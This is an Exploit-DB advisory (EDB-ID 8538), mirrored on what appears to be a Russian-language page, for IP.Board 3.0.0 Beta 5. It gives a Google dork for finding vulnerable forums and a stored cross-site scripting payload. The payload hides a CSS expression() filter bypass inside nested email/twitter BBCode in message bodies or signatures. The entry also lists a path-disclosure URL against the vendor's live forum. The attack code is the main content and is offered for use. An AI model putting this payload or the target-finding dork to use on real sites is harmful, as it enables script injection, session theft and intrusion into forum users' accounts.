- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8538
- Проверка EDB
-
- Пройдено
- Автор
- BRAIN[PILLOW]
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-04-27
Код:
================================================================================
Found : brain[pillow]
Dork : "Powered By IP.Board 3.0.0 Beta 5"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Greetz: slider, halkfild, m0nzt3r, c411k, ettee
Mail : [email protected]
Note: works on IE 6,7,8. maybe all betas are vulnerable and it is possible to tune the xss for FF 2.0 too ;)
================================================================================
Active XSS in message body or signature:
[email]qwe@[twitter]dodo style=`top:expr/*
*/ession/*bypassed*/(alert(/yahoo/))`do[/twitter]qwe.com[/email]
================================================================================
Path disclosure:
http://forums.invisionpower.com/index.php?app=core&module=ajax§ion=register&do=check-display-name&name[]=
================================================================================
# milw0rm.com [2009-04-27]- Источник
- www.exploit-db.com
